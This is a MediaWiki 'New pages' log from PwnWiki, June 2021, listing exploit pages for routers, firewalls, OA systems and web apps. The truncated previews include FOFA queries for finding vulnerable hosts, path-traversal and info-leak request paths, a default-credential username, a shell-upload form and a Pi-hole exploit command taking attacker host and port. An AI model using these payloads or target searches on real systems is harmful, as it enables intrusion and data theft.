New pages
From PwnWiki
(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)
- 09:19, 19 June 2021 Dlink DSL2750U - 'Reboot' 命令注入漏洞 (hist | edit) [3,331 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection # Date: 17-06-2021 # Exploit Author: Mohammed Hadi (HadiMed) # Vendor Homepage: https://me.dlink.com...")
- 09:18, 19 June 2021 ICE Hrm 29.0.0.OS - 'xml upload' XSS漏洞 (hist | edit) [1,096 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS) # Exploit Author: *Piyush Patil *& Rafal Lykowski # Vendor Homepage: https://icehrm.c...")
- 09:18, 19 June 2021 ICE Hrm 29.0.0.OS - 'Account Takeover' CSRF漏洞 (hist | edit) [1,269 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF) # Exploit Author: *Piyush Patil* & Rafal Lykowski # Vendor Homepage: https://ic...")
- 09:16, 19 June 2021 ICE Hrm 29.0.0.OS XSS漏洞 (hist | edit) [1,051 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation # Exploit Author: *Piyush Patil *& Rafal Lykowski # Vendor Homepage: ht...")
- 17:50, 18 June 2021 極通EWEBS casmain.xgi 任意文件讀取漏洞/zh-cn (hist | edit) [587 bytes] Pwnwiki (talk | contribs) (Created page with "极通EWEBS")
- 17:49, 18 June 2021 極通EWEBS casmain.xgi 任意文件讀取漏洞 (hist | edit) [706 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== <!--T:1--> <!--T:2--> 極通EWEBS </translate> ==FOFA== <pre> app="新软科技-极通EWEBS" </pre> ==POC== <translate> 漏洞...")
- 17:47, 18 June 2021 極通EWEBS testweb.php 敏感信息泄漏漏洞/zh-cn (hist | edit) [151 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
- 17:45, 18 June 2021 磊科 NI360路由器 認證繞過漏洞/zh-cn (hist | edit) [188 bytes] Pwnwiki (talk | contribs) (Created page with "添加如下Cookie字段,刷新即可。")
- 17:45, 18 June 2021 極通EWEBS testweb.php 敏感信息泄漏漏洞 (hist | edit) [198 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== 極通EWEBS </translate> ==FOFA== <pre> app="新软科技-极通EWEBS" </pre> ==Payload== <pre> http://<target>/testweb.php </pre>")
- 17:40, 18 June 2021 磊科 NI360路由器 認證繞過漏洞 (hist | edit) [307 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== 磊科 NI360路由器 </translate> ==FOFA== <pre> title="Netcore" </pre> <translate> ==漏洞利用== </translate> <translate>...")
- 17:38, 18 June 2021 MagicFlow 防火牆網關 main.xp 任意文件讀取漏洞/zh-cn (hist | edit) [226 bytes] Pwnwiki (talk | contribs) (Created page with "MagicFlow 防火墙网关 main.xp 任意文件读取漏洞")
- 17:36, 18 June 2021 MagicFlow 防火牆網關 main.xp 任意文件讀取漏洞 (hist | edit) [273 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== MagicFlow 防火牆網關 </translate> ==FOFA== <pre> app="MSA/1.0" </pre> ==POC== <pre> /msa/main.xp?Fun=msaDataCenetrDownLoadMo...")
- 17:36, 18 June 2021 H3C SecPath 下一代防火牆 任意文件下載漏洞/zh-cn (hist | edit) [240 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
- 17:33, 18 June 2021 D-Link DSR-250N 萬能密碼漏洞/zh-cn (hist | edit) [152 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
- 17:32, 18 June 2021 H3C SecPath 下一代防火牆 任意文件下載漏洞 (hist | edit) [276 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> H3C SecPath ==FOFA== <pre> title="Web user login" </pre> ==POC== <pre> /webui/?g=sys_dia_data_down&file_name=../etc/p...")
- 17:30, 18 June 2021 金和OA C6 download.jsp 任意文件讀取漏洞/zh-cn (hist | edit) [278 bytes] Pwnwiki (talk | contribs) (Created page with "金和OA")
- 17:29, 18 June 2021 D-Link DSR-250N 萬能密碼漏洞 (hist | edit) [224 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> D-Link DSR-250N ==FOFA== <pre> app="D_Link-DSR-250N" </pre> <translate> ==萬能密碼== </translate> <pre> user: adm...")
- 17:24, 18 June 2021 金和OA C6 download.jsp 任意文件讀取漏洞 (hist | edit) [361 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== 金和OA </translate> ==FOFA== <pre> app="Jinher-OA" </pre> ==Payload== <pre> /C6/Jhsoft.Web.module/testbill/dj/download.asp?file...")
- 11:00, 18 June 2021 Online Shopping Portal 3.1 遠程代碼執行漏洞/zh-cn (hist | edit) [3,623 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
- 10:58, 18 June 2021 Online Shopping Portal 3.1 遠程代碼執行漏洞 (hist | edit) [3,659 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> Version: V3.1 ==EXP== <pre> # Exploit Title: Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated) # D...")
- 10:57, 18 June 2021 Laravel 5 報錯信息泄漏漏洞/zh-cn (hist | edit) [162 bytes] Pwnwiki (talk | contribs) (Created page with "Laravel 5 报错信息泄漏漏洞")
- 10:57, 18 June 2021 CVE-2021-31159 Zoho ManageEngine ServiceDesk Plus MSP 9.4 用戶枚舉漏洞/zh-cn (hist | edit) [2,324 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
- 10:54, 18 June 2021 CVE-2021-31159 Zoho ManageEngine ServiceDesk Plus MSP 9.4 用戶枚舉漏洞 (hist | edit) [2,360 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> Zoho ManageEngine ServiceDesk Plus 9.4 ==EXP== <pre> # Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - Use...")
- 09:02, 18 June 2021 Laravel 5 報錯信息泄漏漏洞 (hist | edit) [198 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> Laravel 5 ==FOFA== <pre> title=="Whoops!There was an error." </pre> ==Payload== <pre> \Whoops\Handler\PrettyPageHand...")
- 21:39, 17 June 2021 H3C HG659 lib 任意文件讀取漏洞/zh-cn (hist | edit) [260 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
- 21:36, 17 June 2021 H3C HG659 lib 任意文件讀取漏洞 (hist | edit) [534 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> H3C HG659 </pre> ==FOFA== <pre> app="HUAWEI-Home-Gateway-HG659" </pre> ==POC== <pre> /lib///....//....//....//...")
- 16:21, 17 June 2021 Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path (hist | edit) [1,852 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 16-06-2021 # Vendor Homepage: https://www.disksavvy.com #...")
- 16:20, 17 June 2021 Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path (hist | edit) [1,890 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 16-06-2021 # Vendor Homepage: https://www.syncbreeze.com/...")
- 16:20, 17 June 2021 Unified Office Total Connect Now 1.0 SQL注入漏洞 (hist | edit) [1,898 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: Unified Office Total Connect Now 1.0 – 'data' SQL Injection # Shodan Filter: http.title:"TCN User Dashboard" # Date: 06-16-2021 # Exploit Author: Ajai...")
- 09:18, 17 June 2021 CNVD-2019-06255 CatfishCMS遠程命令執行漏洞/es (hist | edit) [218 bytes] Pwnwiki (talk | contribs) (Created page with "CNVD-2019-06255 Vulnerabilidad de ejecución remota de comandos de CatfishCMS")
- 09:15, 17 June 2021 CVE-2019-14234 Django JSONField SQL注入漏洞/es (hist | edit) [1,349 bytes] Pwnwiki (talk | contribs) (Created page with "acceso:")
- 09:15, 17 June 2021 CVE-2018-15139 OpenEMR 5.0.1.3 遠程代碼執行漏洞/es (hist | edit) [23,265 bytes] Pwnwiki (talk | contribs) (Created page with "== Versión afectada ==")
- 09:13, 17 June 2021 CVE-2020-8840 FasterXML jackson-databind 遠程代碼執行漏洞/es (hist | edit) [735 bytes] Pwnwiki (talk | contribs) (Created page with "CVE-2020-8840 FasterXML vulnerabilidad de ejecución remota de código jackson-databind")
- 09:05, 17 June 2021 CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞/zh-cn (hist | edit) [878 bytes] Pwnwiki (talk | contribs) (Created page with "CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞")
- 09:03, 17 June 2021 CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞 (hist | edit) [997 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==利用條件== </translate> <translate> 開啟enableDefaultTyping() 使用了org.apache.drill.exec:drill-jdbc-all第三方依賴 </translate> <tr...")
- 09:01, 17 June 2021 CVE-2020-8840 FasterXML jackson-databind 遠程代碼執行漏洞/zh-cn (hist | edit) [691 bytes] Pwnwiki (talk | contribs) (Created page with "CVE-2020-8840 FasterXML jackson-databind 远程代码执行漏洞")
- 08:58, 17 June 2021 CVE-2020-8840 FasterXML jackson-databind 遠程代碼執行漏洞 (hist | edit) [774 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> <translate> jackson-databind 2.0.0 – 2.9.10.2 經驗證fastjson在開啟了autoType功能的情況下,影響最新...")
- 08:53, 17 June 2021 CVE-2020-7961 Liferay Portal Json Web Service 反序列化漏洞/zh-cn (hist | edit) [8,090 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
- 08:51, 17 June 2021 CVE-2019-18951 Xfilesharing 2.5.1 本地文件上傳shell漏洞/zh-cn (hist | edit) [362 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
- 08:50, 17 June 2021 CVE-2020-7961 Liferay Portal Json Web Service 反序列化漏洞 (hist | edit) [8,126 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> Liferay Portal 6.1.X Liferay Portal 6.2.X Liferay Portal 7.0.X Liferay Portal 7.1.X Liferay Portal 7.2.X </pre>...")
- 08:47, 17 June 2021 CVE-2019-18951 Xfilesharing 2.5.1 本地文件上傳shell漏洞 (hist | edit) [398 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> Version: <=2.5.1 </pre> ==EXP== <pre> <form action="http://<target>/cgi-bin/up.cgi" method="post" enctype="multi...")
- 08:43, 17 June 2021 CKEditor 3 SSRF漏洞 (hist | edit) [1,589 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: CKEditor 3 - Server-Side Request Forgery (SSRF) # Google Dorks : inurl /editor/filemanager/connectors/uploadtest.html # Date: 12-6-2021 # Exploit Author...")
- 17:42, 16 June 2021 CVE 2020-8816 Pi-hole 遠程代碼執行漏洞/zh-cn (hist | edit) [3,152 bytes] Pwnwiki (talk | contribs) (Created page with "CVE 2020-8816 Pi-hole 远程代码执行漏洞")
- 17:40, 16 June 2021 CVE 2020-8816 Pi-hole 遠程代碼執行漏洞/zh-hant (hist | edit) [3,152 bytes] Pwnwiki (talk | contribs) (Created page with "==影響版本==")
- 17:39, 16 June 2021 CVE 2020-8816 Pi-hole 遠程代碼執行漏洞 (hist | edit) [3,188 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==影響版本== </translate> Pi-hole <= 4.3.2 ==POC== <pre> go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://target/admin/ </pr...")
- 17:37, 16 June 2021 CVE-2020-12078 Open-AudIT v3.3.1 遠程命令執行漏洞/zh-cn (hist | edit) [4,648 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
- 17:35, 16 June 2021 CVE-2020-12078 Open-AudIT v3.3.1 遠程命令執行漏洞 (hist | edit) [4,684 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> Open-AudIT v3.3.1 </pre> ==EXP== <pre> #!/usr/bin/python3 # Exploit Title: Open-AudIT Professional v3.3.1 Remot...")
- 17:35, 16 June 2021 CVE-2020-7246 qdPM 9.1 遠程代碼執行漏洞/zh-cn (hist | edit) [4,529 bytes] Pwnwiki (talk | contribs) (Created page with "CVE-2020-7246 qdPM 9.1 远程代码执行漏洞")
- 17:33, 16 June 2021 CVE-2020-7246 qdPM 9.1 遠程代碼執行漏洞 (hist | edit) [4,565 bytes] Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Version: <=1.9.1 </pre> ==EXP== <pre> # Exploit Title: qdPM 9.1 - Remote Code Execution # Google Dork: intitle:...")
- 17:29, 16 June 2021 Teachers Record Management System 1.0 XSS漏洞 (hist | edit) [1,138 bytes] Pwnwiki (talk | contribs) (Created page with "<pre> # Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS) # Date: 05-10-2021 # Exploit Author: nhattruong # Vendor Homepage: h...")
